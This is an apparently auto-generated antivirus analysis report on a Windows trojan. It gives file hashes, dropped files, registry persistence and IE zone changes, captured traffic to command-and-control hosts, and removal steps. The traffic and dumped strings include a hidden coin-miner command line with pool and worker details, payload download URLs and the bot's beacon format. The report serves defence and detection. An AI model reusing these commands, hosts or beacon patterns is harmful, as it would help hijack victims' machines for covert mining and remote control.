Trojan.Win32.Chebri.jm (Kaspersky), Gen:Variant.Symmi.42922 (AdAware), Trojan.Win32.Swrort.3.FD, Trojan.Win32.Swrort.5.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 204939cf633f794950a64b42ef0088de
SHA1: c2ad31eb6e50f0eac6c6df2aa8334da720683eee
SHA256: 359fc8444f51630ffe613c5a1683e79126d4cf4de3312cf5840e3811ffbdd879
SSDeep: 1536:ug2DwhXt6GdnssmBhWGKdEfnReWUkANjq3PTepCv9czvIKsF5iDZkEdvisaE0g:/2M1p94TWGKdEEWcdkbepACzIKK5iDZB
Size: 95744 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-07 07:24:11
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
0003F.tmp.exe:1500
%original file name%.exe:1836
The Trojan injects its code into the following process(es):
%original file name%.exe:640
minerd.exe:364
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
%Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
%Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
%Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (0 bytes)
Registry activity
The process 0003F.tmp.exe:1500 makes changes in the system registry.
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"WINSXS32"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WINSXS32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"
The process %original file name%.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF B2 08 ED 19 F4 D8 3A 08 CE A1 F7 59 C7 2F 06"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that local web nodes whose names contain no dots and that are not assigned to any other zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 9C 07 5D EF F6 B5 55 E4 20 15 4E E3 EE 30 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1402115051"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
The process minerd.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 0E 2B E0 B3 5E 71 F6 03 B0 96 15 E8 8A 93 8A"
Dropped PE files
MD5 | File path |
---|---|
b3b52fec86b2f0602e4ee6726cedb475 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll |
ac05fbba61f939cd90133032f2595c69 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
0003F.tmp.exe:1500
%original file name%.exe:1836
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
%Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
%Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
%Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 39679 | 39936 | 4.49839 | 79a4a2e4dcaf9a3aeeee6e2782378240 |
.rdata | 45056 | 16206 | 16384 | 3.62658 | 70c87e14c493e857c346d7b32c1713c4 |
.data | 61440 | 19628 | 7680 | 4.01315 | bfdf697f4ba0816dbcf9330733889a0a |
.855645 | 81920 | 36 | 512 | 0.49456 | 4305edff9a269f78669d34a099c4bf1f |
.41d3359 | 86016 | 36 | 512 | 0.495582 | 0d37efda672e26ceb5f6ff7e7ae2a1af |
.c3a6f7 | 90112 | 4 | 512 | 0.056519 | d46190223de12e4e4a1db0b9c8d15584 |
.rsrc | 94208 | 28792 | 29184 | 4.76706 | 7282b099135755d52d4a881e04ea2936 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://carpetbrownsurface.com/index.php | |
hxxp://www5.0zz0.com/2014/05/28/22/846767599.png | |
hxxp://google.com/ | |
hxxp://www.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw | |
hxxp://www6.0zz0.com/2014/05/29/00/888256212.png | |
hxxp://www13.0zz0.com/2014/05/29/00/562309044.png | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /2014/05/29/00/888256212.png HTTP/1.1
Host: www6.0zz0.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:38 GMT
Server: Apache
Last-Modified: Thu, 29 May 2014 00:16:18 GMT
ETag: "d71032a-468a9-d67a3880"
Accept-Ranges: bytes
Content-Length: 288937
Connection: close
Content-Type: image/png
ZS...vH......Q6..HciO..z9..F.......7..6E.~jx)Wn...._. .quA.]9..S.$RS...H^N...`n.~..z8..z...vHuX\.....~QpPU...L@l..g...r'w...b.......^W.'......3..!.-....]qb...y|...f.....6.s.2......<.t...S>..H.D.N..@f.bu3z...^N.X.[S. Ds....0d=....!.{..(?Pz.V.}....73.....d...F........[.d?.|J.b....chE.n1..[.o*tvb.\s..8.....b.O..'`v...7..tq.........6XS......@....Q6..H.X.&...n...................-..........s..$$......H....d...f...<x.c..iA.p=..J(Ic.T[<.JE{._.R...............B/......O5..y...,J.|[..pWT...c.`..........!.ix..b@.sn....H.X.i.......rVh.2z.h....]....i.....m..r.T-0..........I...`.H.......^Qr.A...]hQq.r.h.nD..e.)B.y$.`.R38.AM):......'...(}...*....b.I.f|.....8..,.......`8.\z.....h....\..r...`.mh..8,.D...."...@.O9..*$N.%.1....d'-.....qg.`y...w6f..j..2&......w ...|...}..J.u.......}...cxFL09X...............,...-[aT./N..H..U..6..V..F.Z...U.(.j..C.....(.-..W..M...#VYGRl.?..7&..a......h\.. .....z._SO..04....*.U...}/.k<Y:.a..HH......h...B...e.6`.f.. ...........lh.".....]......`.Q.R........u../..=..a...2..........Cz.`...L..s.....HV*.b.[.)&......|^7c.......a.....v.#H..yC.l.^G.t.G...S.'...pF..G..:G...lG2a....9*... ..R..F....NrW.0.f#.....s0y...5.a..\1M....TP......Z..:..........t.,.]FA.....B-.c..s]/.I.....#N.YQ..U..18JA..>.`....?.;G.tz.G?.......NM.....C^3.........Z0....-3.J..7....B..xvp..V..]....T.K.......QeX...d.G..aB..1.L...2..q0.A.j(..U..O_..p..B...G....,J.q.k%.|..?8...D..X8.6.1L4..`W.uc.K...:.....S...;....c,&.aV.........M..~ ...p....Kz.t...l.....T.-h.M.......W....^>"...h.r.:L.!..(S.....].7...D.`.]~..~GC..@.n.....%..
<<
<<< skipped >>>
GET /2014/05/29/00/562309044.png HTTP/1.1
Host: www13.0zz0.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:37 GMT
Server: Apache
Last-Modified: Thu, 29 May 2014 00:16:44 GMT
ETag: "71702c3-468a9-d806f300"
Accept-Ranges: bytes
Content-Length: 288937
Connection: close
Content-Type: image/png
ZS...vH......Q6..HciO..z9..F.......7..6E.~jx)Wn...._. .quA.]9..S.$RS...H^N...`n.~..z8..z...vHuX\.....~QpPU...L@l..g...r'w...b.......^W.'......3..!.-....]qb...y|...f.....6.s.2......<.t...S>..H.D.N..@f.bu3z...^N.X.[S. Ds....0d=....!.{..(?Pz.V.}....73.....d...F........[.d?.|J.b....chE.n1..[.o*tvb.\s..8.....b.O..'`v...7..tq.........6XS......@....Q6..H.X.&...n...................-..........s..$$......H....d...f...<x.c..iA.p=..J(Ic.T[<.JE{._.R...............B/......O5..y...,J.|[..pWT...c.`..........!.ix..b@.sn....H.X.i.......rVh.2z.h....]....i.....m..r.T-0..........I...`.H.......^Qr.A...]hQq.r.h.nD..e.)B.y$.`.R38.AM):......'...(}...*....b.I.f|.....8..,.......`8.\z.....h....\..r...`.mh..8,.D...."...@.O9..*$N.%.1....d'-.....qg.`y...w6f..j..2&......w ...|...}..J.u.......}...cxFL09X...............,...-[aT./N..H..U..6..V..F.Z...U.(.j..C.....(.-..W..M...#VYGRl.?..7&..a......h\.. .....z._SO..04....*.U...}/.k<Y:.a..HH......h...B...e.6`.f.. ...........lh.".....]......`.Q.R........u../..=..a...2..........Cz.`...L..s.....HV*.b.[.)&......|^7c.......a.....v.#H..yC.l.^G.t.G...S.'...pF..G..:G...lG2a....9*... ..R..F....NrW.0.f#.....s0y...5.a..\1M....TP......Z..:..........t.,.]FA.....B-.c..s]/.I.....#N.YQ..U..18JA..>.`....?.;G.tz.G?.......NM.....C^3.........Z0....-3.J..7....B..xvp..V..]....T.K.......QeX...d.G..aB..1.L...2..q0.A.j(..U..O_..p..B...G....,J.q.k%.|..?8...D..X8.6.1L4..`W.uc.K...:.....S...;....c,&.aV.........M..~ ...p....Kz.t...l.....T.-h.M.......W....^>"...h.r.:L.!..(S.....].7...D.`.]~..~GC..@.n.....%..
<<
<<< skipped >>>
POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: 4C9B53A8086004515190B6B74733CD51
Host: carpetbrownsurface.com
Content-Length: 175
Cache-Control: no-cache
0=D4DD6EBD91&1=0&2=A7BE76C69182033329D77E&3=B0BE2CF2D2B8134E4FBE0E8E3DAA&4=AF9D2FF6CCF5613439A12AC11ACB754E1F10368B349407C22F0E555EB6C25950F4E3DB52CCD4EF9C615AE3B0CEF613&5=&6=
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 03 Jul 2014 16:54:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14 deb7u9
258....[...3...O.$s.4?S..|.S.5.Z...L;...R....|F....Y....H.R..V.[.....:....d)..o.W....r..9-\,e2e.).*. .)&8%...........%_^.G......hGn. ..u......$.h..3.H..E!..#.].I.e.p8...]_.H.T@.~..\'..x.{AX.M..".........5s.%..N:.....g.t{....U....>.i.qJRm...R.cl/!.v..(....Z.H.M|.D.PZ.......@.....^....Y.F.m....o>O.9........z.j.. b#../.N.2}_e..E9.a..hA=b........t.:.ZE.;.....j..q......{$R....8Z..M........a//..kC ....u.F.w..(.7.j......|..'..i..O....T.d]U..8^..U.\....N.K.H...u.<....Z ..$.....'a.Q`.QO...[.@ *)...D.....o...H.m.%.i..8.!..1....w..}.......X...nM.r......&..//..G.....3.D..M.....K..s.4....A.a....!,......lH...7 ...0..
GET / HTTP/1.1
Host: google.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw
Content-Length: 258
Date: Thu, 03 Jul 2014 17:02:42 GMT
Server: GFE/2.0
Alternate-Protocol: 80:quic
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw">here</A>...</BODY></HTML>....
GET /2014/05/28/22/846767599.png HTTP/1.1
Host: www5.0zz0.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:35 GMT
Server: Apache
Last-Modified: Wed, 28 May 2014 22:59:13 GMT
Accept-Ranges: bytes
Content-Length: 4608
Connection: close
Content-Type: image/png
..#./.7..@.W..^.........M..K.W...m........R....@.--......Zy.......G.........Xm........(..]....-....'...j0.bs...w....d.......D9.u%......S!.}...:......o....I<Rc;....Mb..q...v}..R....Y......vl.b.H .#.O;.F....D.....X...z...c:n...&p.0....}O..Ox9G..:.I.mV.._B.&.5%..`.0LM.......C.2....U...7......LS[..@.f.n.... ...........Q......Oy.E..^.T...x.%.....g..58=....Q.%.....t..........$.{...*.~.nm.....$.E....n...88p.....9.o-.s.q.i...MP....S..R.4.oCz.*.....g.df...X'..;....?~..K.B.(....@.T. .........n.A@.....~.d...]8..R.f...0.T.....i..<.h....A..`............].o...!..Xqa8..5Wc@.L=.&.%.p.@..U'....<..3..4H7.u..V....j...\...v.Sv*s.j..V=.V...K.vUd....){.._Q....V26.=.].Y$*...M3j..Jw`...B..!1..)....JL...A......P........?@...d.$......ye..1.....r.e.e......a`...-U$.<..>...9.%<Z.8.}..g.=....^....p.K..%.....]....$)......G...o.\.~.<c.4?9a....P.@....N.)7..0%h...h..u.D..Q.0..G4.....}.....;8..UA.sAV.H...........<...?fs...N$...Br a.vx.....y.....(...........CRJgf......0...-......~.'......Vw...y.....&.!!...{A.G.[.d.....Xc.b4..:vw*.......i.......G...x.....U|.cd,.@..~e..IT~.g?.4.{.po.....!.[p....1.v.\......'.'. 3.>.9.........7O......d28....................*..*gH .8...O..!\.?D......=.Iyq..^...j...f..`.$F....(R.,..'...U.3..:Y...4..X....a...v..:.......8..j.^...;......Q..:b..... 5....m.KoA......>q....16.e#32.<Ty.......9..q..G..5....5......mu..3.y.....W.....K....*.gH...<%-...@.b...!.{^.....7.9..7.}y...`......?Ma.(...X .M.Z.C4J...|..5.:..do...N.IJ.F{....../..x7}BH."..Q....v.F...... .]..:-_b..&....!.-...d.....f\.....O...
<<
<<< skipped >>>
GET /?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw HTTP/1.1
Host: VVV.google.ca
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:42 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: PREF=ID=a925c378d21ce293:FF=0:TM=1404406962:LM=1404406962:S=KArret2NkGUXTIqS; expires=Sat, 02-Jul-2016 17:02:42 GMT; path=/; domain=.google.ca
Set-Cookie: NID=67=BoS7-YpbkZYYxrZzYwTQm7_Eq70VeqxwWULcrm4HbSYyV4u7QEL-lisxKUuFWiBmnSrvSwXutG5XPxcnG663bxQ6eFoPkEdaP9PFL7SOpMcZ5UeObC5efZKJkZtaXdfM; expires=Fri, 02-Jan-2015 17:02:42 GMT; path=/; domain=.google.ca; HttpOnly
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic
Transfer-Encoding: chunked
8000..<!doctype html><html itemscope="" itemtype="hXXp://schema.org/WebPage" lang="en-CA"><head><meta content="/images/google_favicon_128.png" itemprop="image"><title>Google</title><script>(function(){.window.google={kEI:"soy1U_T9DaPksASZnIGoAw",getEI:function(a){for(var c;a&&(!a.getAttribute||!(c=a.getAttribute("eid")));)a=a.parentNode;return c||google.kEI},https:function(){return"https:"==window.location.protocol},kEXPI:"4791,4896,17259,4000116,4007661,4007830,4008142,4009033,4009641,4010806,4010858,4010899,4011228,4011258,4011679,4012373,4012504,4013395,4013414,4013591,4013723,4013787,4013823,4013920,4013967,4013979,4014016,4014093,4014431,4014515,4014637,4014671,4014804,4014991,4015234,4015236,4015260,4015266,4015550,4015587,4015633,4015772,4015989,4016127,4016309,4016367,4016372,4016487,4016824,4016855,4016976,4017162,4017204,4017280,4017285,4017544,4017554,4017579,4017595,4017612,4017639,4017681,4017694,4017710,4017742,4017789,4017818,4017881,4017894,4017902,4017913,4017981,4017982,4018009,4018019,4018030,4018126,4018159,4018283,4018363,4018416,4018480,4018511,4018519,4018532,4018542,4018554,4018569,4018621,4018638,4018757,4018834,4018914,4018923,4018933,4018949,4019005,4019037,4019074,4019084,4019142,4019184,4019191,4019200,4019205,4019268,4019281,4019387,4019415,4019423,4019427,4019429,4019438,4019661,8300007,8300012,8300027,8300057,8500223,8500256,8500272,8500306,8500357,8500365,8500394,8500421,8500433,8500444,8500462,8500470,8500472,8500495,10200044,10200083,1
<<
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_640:
.text
`.rdata
@.data
user32.dll
kernel32.dll
ShellExecuteW
shell32.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
advapi32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenUrlW
wininet.dll
|PAM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
http://www5.0zz0.com/2014/05/28/22/846767599.png
Shttp://google.com/
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
minerd.exe
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
/index.php
HTTP/1.1
carpetbrownsurface.com
roofingropers.com
greenalgeaocean.com
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
@c:\%original file name%.exe
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Application Data
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%System%
xncqnyyorsxlq.exe
wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
libcurl.dll
2.5.1
%original file name%.exe_640_rwx_00330000_00004000:
.rdart
32.dl
2<3=4>5?6?7?8
ntdll.dll
%original file name%.exe_640_rwx_00340000_00021000:
.rdart
32.dl
2<3=4>5?6?7?8
%original file name%.exe_640_rwx_00370000_00033000:
.text
`.rdata
@.data
user32.dll
kernel32.dll
ShellExecuteW
shell32.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
advapi32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenUrlW
wininet.dll
AM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
/index.php
HTTP/1.1
